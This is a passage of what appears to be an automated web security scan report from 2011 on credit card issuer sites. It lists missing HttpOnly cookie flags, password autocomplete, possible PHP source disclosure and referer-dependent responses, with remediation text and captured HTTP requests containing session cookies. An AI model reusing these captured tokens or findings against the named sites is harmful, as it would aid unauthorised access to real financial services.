BIGipServerpl_capitalone.com_80=828974346.29215.0000; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.41. http://www.capitalone.com/css/page-type/portal_popup.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/css/page-type/portal_popup.css

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

v1st=D266E53D0B03223F; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com
BIGipServerpl_capitalone.com_80=828974346.29215.0000; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.42. http://www.capitalone.com/css/page-type/portal_product.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/css/page-type/portal_product.css

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

v1st=1B84F757B67B6884; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com
BIGipServerpl_capitalone.com_80=828974346.29215.0000; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.43. http://www.capitalone.com/css/portal_footer.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/css/portal_footer.css

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

v1st=18941BEAA04F3459; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com
BIGipServerpl_capitalone.com_80=828974346.29215.0000; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.44. http://www.capitalone.com/css/portal_header.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/css/portal_header.css

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

v1st=FC628D4CC1E8D53; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com
BIGipServerpl_capitalone.com_80=828974346.29215.0000; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.45. http://www.capitalone.com/css/portal_page-nav-heading.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/css/portal_page-nav-heading.css

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

v1st=336BE560308D6ECB; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com
BIGipServerpl_capitalone.com_80=828974346.29215.0000; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.46. http://www.capitalone.com/img/global/icon/lock.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/img/global/icon/lock.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

v1st=8EA70C0FA4A60600; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com
BIGipServerpl_capitalone.com_80=828974346.29215.0000; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.47. http://www.capitalone.com/img/global/logo/ehl.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/img/global/logo/ehl.png

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

v1st=E628BAC2937BAB66; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com
BIGipServerpl_capitalone.com_80=828974346.29215.0000; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.48. http://www.capitalone.com/img/global/logo/fdic.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/img/global/logo/fdic.png

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

v1st=34DF7D6482753A91; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com
BIGipServerpl_capitalone.com_80=828974346.29215.0000; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.49. http://www.capitalone.com/img/global/logo/sprite/header.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/img/global/logo/sprite/header.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

v1st=416EE042D34F4E42; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com
BIGipServerpl_capitalone.com_80=828974346.29215.0000; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.50. http://www.capitalone.com/js/component/portal_accordion.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/js/component/portal_accordion.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

v1st=9A9F2B2775C2D986; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com
BIGipServerpl_capitalone.com_80=828974346.29215.0000; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.51. http://www.capitalone.com/js/component/portal_open_account.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/js/component/portal_open_account.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

v1st=54FB887DB689A0C6; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com
BIGipServerpl_capitalone.com_80=828974346.29215.0000; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.52. http://www.capitalone.com/js/component/portal_swfobject.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/js/component/portal_swfobject.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

v1st=C10919DDE4849D4F; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com
BIGipServerpl_capitalone.com_80=828974346.29215.0000; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.53. http://www.capitalone.com/js/component/portal_utilitynav.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/js/component/portal_utilitynav.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

v1st=621B246FA5B61ECD; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com
BIGipServerpl_capitalone.com_80=828974346.29215.0000; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.54. http://www.capitalone.com/js/global/cof/portal_header.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/js/global/cof/portal_header.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

v1st=A664F526D8F83526; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com
BIGipServerpl_capitalone.com_80=828974346.29215.0000; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.55. http://www.capitalone.com/js/global/cof/portal_headerFooter.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/js/global/cof/portal_headerFooter.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

v1st=36F95AE8B71D2AB1; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com
BIGipServerpl_capitalone.com_80=828974346.29215.0000; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.56. http://www.capitalone.com/js/global/portal_cof.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/js/global/portal_cof.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

v1st=82B666A5B70ED0B6; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com
BIGipServerpl_capitalone.com_80=828974346.29215.0000; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.57. http://www.capitalone.com/js/global/portal_footnote.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/js/global/portal_footnote.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

v1st=CAAEBF3CF4187A6F; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com
BIGipServerpl_capitalone.com_80=828974346.29215.0000; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.58. http://www.capitalone.com/js/global/portal_global.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/js/global/portal_global.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

v1st=D36C8BEC5661A873; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com
BIGipServerpl_capitalone.com_80=828974346.29215.0000; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.59. http://www.capitalone.com/js/liveperson/LivePerson_USC_VS.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/js/liveperson/LivePerson_USC_VS.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

v1st=3750237ABB1E26AD; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com
BIGipServerpl_capitalone.com_80=828974346.29215.0000; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.60. http://www.capitalone.com/js/liveperson/mtagconfig.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/js/liveperson/mtagconfig.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

v1st=F027C4BD465C43C; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com
BIGipServerpl_capitalone.com_80=828974346.29215.0000; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.61. http://www.capitalone.com/js/onlineopinionF3cS/oo_conf_en-US.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/js/onlineopinionF3cS/oo_conf_en-US.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

v1st=E65A92900568B78D; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com
BIGipServerpl_capitalone.com_80=828974346.29215.0000; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.62. http://www.capitalone.com/js/onlineopinionF3cS/oo_engine.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/js/onlineopinionF3cS/oo_engine.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

v1st=7EAFCCE87BE48675; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com
BIGipServerpl_capitalone.com_80=828974346.29215.0000; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.63. http://www.capitalone.com/js/questus/config.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/js/questus/config.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

v1st=B2643B616AC9A640; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com
BIGipServerpl_capitalone.com_80=828974346.29215.0000; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.64. http://www.capitalone.com/js/questus/intercept.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/js/questus/intercept.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

v1st=B833A23EE35CDFDA; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com
BIGipServerpl_capitalone.com_80=828974346.29215.0000; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.65. http://www.capitalone.com/media/graphic_logo/global/button/action-oversized-apply-now.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/media/graphic_logo/global/button/action-oversized-apply-now.png

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

v1st=CA5579C54B3656E9; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com
BIGipServerpl_capitalone.com_80=828974346.29215.0000; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.66. http://www.capitalone.com/media/graphic_logo/small_business/card_art/card_art_sb_venture_v.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/media/graphic_logo/small_business/card_art/card_art_sb_venture_v.jpg

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

v1st=CA8592065BB2D7FA; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com
BIGipServerpl_capitalone.com_80=828974346.29215.0000; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.67. https://www.citicards.com/cards/acq/TimeOut.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.citicards.com
Path:	/cards/acq/TimeOut.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACQHSIDKEY=HSID4T3ZJ3000; Path=/; Domain=www.citicards.com; Secure

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cards/acq/TimeOut.do?ACQHSIDKEY=HSID4T3ZJ3000 HTTP/1.1
Host: www.citicards.com
Connection: keep-alive
Referer: https://www.citicards.com/cards/acq/Apply.do?app=UNSOL&sc=4T3ZJR81&m=3CJ5MDQ93ZW&langId=EN&siteId=CB&B=M&screenID=3000&uc=AKA&t=t&link=Consumer_631529043&ProspectID=36CEB96C744948E481109575676DCE63
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HSID4T3VJ3000=kTjaTGnJbsaejkJUEjjpcU; VISITOR=1308312791632; HSID4T3ZJ3000=vqPrL3WjoMdXwjrs5f4CZU; HSID4DNZJ3000=pLRZjGMdgv4wCXc5EpZAFs; siteId=CB; Channel=CONSUMER_UNSOL; LangId=EN; DecisionMethod=02; ProspectID=C626E9F2656E4606A21348462D13F6BA; CARDS_LOCALE=en; ACQHSIDKEY=HSID4DNZJ3000; JSESSIONID=00007gBbtH4r9cLIjAgDf1NVx27:gtcardsrmi10crd; s_pers=%20gpv_p7%3DCitibank%2520Online%2520Consumer%2520Card%2520-%2520Enter%2520Information%7C1308315857466%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B

Response

10.68. http://www.creditcards.com/oc/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.creditcards.com
Path:	/oc/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

cardOfferHistory=%2Cdeleted; expires=Sun, 17-Jul-2011 11:58:57 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /oc/?pid=22105561&pg=17&pgpos=1 HTTP/1.1
Host: www.creditcards.com
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/business.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCCID=173.193.214.243_20110617053924_f5fd4d9c; s_vi=[CS]v1|26FD9772051603E8-60000177A00CCF03[CE]; SSSC=3.49665759.60098554.232.9134; Apache=66.219.46.81.1308311437978272; PHPSESSID=eaa1e85235ccec63f45bfe7e1b69c40f; ACTREF=eaa1e85235ccec63f45bfe7e1b69c40f_999__201106170650; CURRREF=999; PREVREF=999; SSBAL=node.web1; s_cc=true; CCsCookieimp=1308311932; s_cpm=%5B%5B%27999-0-0-0%27%2C%271308307269913%27%5D%2C%5B%27999-0-9999-9999%27%2C%271308307272532%27%5D%2C%5B%27999-0-0-0%27%2C%271308311460361%27%5D%2C%5B%27999-0-9999-9999%27%2C%271308311937698%27%5D%5D; s_sq=ccardsccdc-us%3D%2526pid%253DTYPE%25253Abusiness%2526pidt%253D1%2526oid%253Dhttp%25253A//www.creditcards.com/oc/%25253Fpid%25253D22105561%252526pg%25253D17%252526pgpos%25253D1%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 11:58:57 GMT
Server: Apache
Expires: Fri, 09 Jul 2010 22:45:02 GMT
Cache-Control: private, no-store, no-cache, max-age=0, must-revalidate, proxy-revalidate
Pragma: no-cache
refresh: 2; url=http://oc.creditcards.com/trans_node.php?aid=999&tid=&cid=9999&did=9999&fid=17&pos=1&evid=1011106170650383a0cd48cdfdd3a86c&ref=&oid=1012011061706585712817512&data3=0&sid=1889&c=22105561
Vary: Accept-Encoding
Content-Length: 3101
Content-Type: text/html
Set-Cookie: cardOfferHistory=%2Cdeleted; expires=Sun, 17-Jul-2011 11:58:57 GMT; path=/

<html>
<head>
<title>Just a Moment While We Direct You to Your Offer</title>
<meta name="robots" content="NOFOLLOW,NOINDEX">
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">

<
...[SNIP]...

10.69. http://www.creditcards.com/sb.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.creditcards.com
Path:	/sb.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

CCsCookieimp=1308311915; expires=Mon, 14-Jun-2021 11:58:35 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sb.php?a_aid=999&a_bid=36 HTTP/1.1
Host: www.creditcards.com
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/points-rewards.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCCID=173.193.214.243_20110617053924_f5fd4d9c; s_vi=[CS]v1|26FD9772051603E8-60000177A00CCF03[CE]; SSSC=3.49665759.60098554.232.9134; Apache=66.219.46.81.1308311437978272; PHPSESSID=eaa1e85235ccec63f45bfe7e1b69c40f; ACTREF=eaa1e85235ccec63f45bfe7e1b69c40f_999__201106170650; CURRREF=999; PREVREF=999; SSBAL=node.web1; s_cpm=%5B%5B%27999-0-0-0%27%2C%271308307269913%27%5D%2C%5B%27999-0-9999-9999%27%2C%271308307272532%27%5D%2C%5B%27999-0-0-0%27%2C%271308311460361%27%5D%5D; s_cc=true; s_sq=%5B%5BB%5D%5D; CCsCookieimp=1308311486

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 11:58:35 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html
Set-Cookie: CCsCookieimp=1308311915; expires=Mon, 14-Jun-2021 11:58:35 GMT; path=/
Cache-Control: private, no-store, no-cache, max-age=0, must-revalidate, proxy-revalidate
Expires: Fri, 09 Jul 2010 22:45:02 GMT
Pragma: no-cache

10.70. https://www.discovercard.com/cardmembersvcs/registration/reg/goto previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.discovercard.com
Path:	/cardmembersvcs/registration/reg/goto

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

wfs=workflow.pwdreset=continue;Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10.71. http://www.wtp101.com/bk previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wtp101.com
Path:	/bk

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

tuuid=73b6b0a9-a657-4959-8c44-a72cc1d5226b; path=/; expires=Sun, 16 Jun 2013 12:12:23 GMT; domain=.wtp101.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10.72. https://www262.americanexpress.com/business-card-application/simplycash-business-credit-card/apply/42732-9-0 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www262.americanexpress.com
Path:	/business-card-application/simplycash-business-credit-card/apply/42732-9-0

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

s_vi=[CS]v1|26FDA14A051D10C8-4000012AC0103AC7[CE]; Expires=Wed, 15 Jun 2016 12:06:48 GMT; Path=/; Domain=.americanexpress.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10.73. https://www262.americanexpress.com/business-card-application/the-plum-card-business-charge-card/apply/42732-9-0/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www262.americanexpress.com
Path:	/business-card-application/the-plum-card-business-charge-card/apply/42732-9-0/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

s_vi=[CS]v1|26FDA14A051D10C8-4000012AC0103AC7[CE]; Expires=Wed, 15 Jun 2016 12:03:57 GMT; Path=/; Domain=.americanexpress.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11. Password field with autocomplete enabled previous next
There are 2 instances of this issue:

https://applynowdc1.chase.com/FlexAppWeb/renderApp.do
https://creditcards.citi.com/

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).

11.1. https://applynowdc1.chase.com/FlexAppWeb/renderApp.do previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://applynowdc1.chase.com
Path:	/FlexAppWeb/renderApp.do

Issue detail

The page contains a form with the following action URL:

https://applynowdc1.chase.com/FlexAppWeb/verifyApp.do

The form contains the following password fields with autocomplete enabled:

usr_password_input
usr_password_input1

Request

GET /FlexAppWeb/renderApp.do?SPID=DF92&CELL=6H8X&AFFID=EhraRx8K_BE-rs08mTiqNvJG3ktOS3.NLg&pvid=1118b79220110c061317070b00ed04 HTTP/1.1
Host: applynowdc1.chase.com
Connection: keep-alive
Referer: http://www.creditcards.com/oc/?pid=22125109&pg=17&pgpos=9
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=DA5FE6157943874D; FlexSessionID=Yqv1N71Nh3KMpxQ41JvJFjTwbJczJGSSL2pQthy2QY1JRMTy16LF!-1254913621

Response

11.2. https://creditcards.citi.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://creditcards.citi.com
Path:	/

Issue detail

The page contains a form with the following action URL:

https://creditcards.citi.com/

The form contains the following password field with autocomplete enabled:

PASSWORD

Request

GET / HTTP/1.1
Host: creditcards.citi.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 66519
Content-Type: text/html; charset=utf-8
Expires: -1
Date: Fri, 17 Jun 2011 12:44:12 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="ctl0
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="/" id="aspnetForm">
<div>
...[SNIP]...
</strong><input id="pw" class="login-text" tabindex="2" name="PASSWORD" maxlength="32" type="password" /> </div>
...[SNIP]...

12. Source code disclosure previous next

Summary

Severity:	Low
Confidence:	Tentative
Host:	http://blogs.creditcards.com
Path:	/s_code.js

Issue detail

The application appears to disclose some server-side source code written in PHP.

Issue background

Server-side source code may contain sensitive information which can help an attacker formulate attacks against the application.

Issue remediation

Server-side source code is normally disclosed to clients as a result of typographical errors in scripts or because of misconfiguration, such as failing to grant executable permissions to a script or directory. You should review the cause of the code disclosure and prevent it from happening.

Request

GET /s_code.js HTTP/1.1
Host: blogs.creditcards.com
Proxy-Connection: keep-alive
Referer: http://blogs.creditcards.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCCID=173.193.214.243_20110617053924_f5fd4d9c; s_vi=[CS]v1|26FD9772051603E8-60000177A00CCF03[CE]; SSSC=3.49665759.60098554.232.9134; PHPSESSID=eaa1e85235ccec63f45bfe7e1b69c40f; ACTREF=eaa1e85235ccec63f45bfe7e1b69c40f_999__201106170650; CURRREF=999; PREVREF=999; s_cc=true; s_cpm=%5B%5B%27999-0-0-0%27%2C%271308307269913%27%5D%2C%5B%27999-0-9999-9999%27%2C%271308307272532%27%5D%2C%5B%27999-0-0-0%27%2C%271308311460361%27%5D%2C%5B%27999-0-9999-9999%27%2C%271308311932226%27%5D%5D; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 11:58:54 GMT
Server: Apache
Last-Modified: Fri, 16 May 2008 19:22:40 GMT
ETag: "e79c2-4d5e-44d5deff5c000"
Accept-Ranges: bytes
Content-Length: 19806
Content-Type: application/javascript

/* SiteCatalyst code version: H.15.1.
Copyright 1997-2008 Omniture, Inc. More info available at
http://www.omniture.com */
/************************ ADDITIONAL FEATURES ************************
P
...[SNIP]...
Number of days to expiration - 0 for session
* Returns:
* v or ''
*
* TEST CASES:
* 1. Page A: s.campaign="123"
* 2. Page A: s.campaign=s.getValOnce(s.campaign,"cname",0)
* 3. Page B: s.campaign="<?= isset($_GET['a_aid']) ? $_GET['a_aid'] : 0;?>-<?= isset($_GET['a_bid']) ? $_GET['a_bid'] : 0;?>-<?= isset($_GET['a_cid']) ? $_GET['a_cid'] : 0;?>-<?= isset($_GET['a_did']) ? $_GET['a_did'] : 0;?>" (cookie value is not overwritten)
* 4. Page A: (user clicks "back") s.campaign="<?= isset($_GET['a_aid']) ? $_GET['a_aid'] : 0;?>-<?= isset($_GET['a_bid']) ? $_GET['a_bid'] : 0;?>-<?= isset($_GET['a_cid']) ? $_GET['a_cid'] : 0;?>-<?= isset($_GET['a_did']) ? $_GET['a_did'] : 0;?>"
* This will de-inflate click-throughs due to back button
*********************************************************************/

/*
* Plugin: getValOnce 0.2 - get a value once per session or number
...[SNIP]...

13. Referer-dependent response previous next
There are 2 instances of this issue:

https://applynowdc1.chase.com/FlexAppWeb/renderApp.do
https://www.citicards.com/ServerError.html

Issue description

The application's responses appear to depend systematically on the presence or absence of the Referer header in requests. This behaviour does not necessarily constitute a security vulnerability, and you should investigate the nature of and reason for the differential responses to determine whether a vulnerability is present.

Common explanations for Referer-dependent responses include:

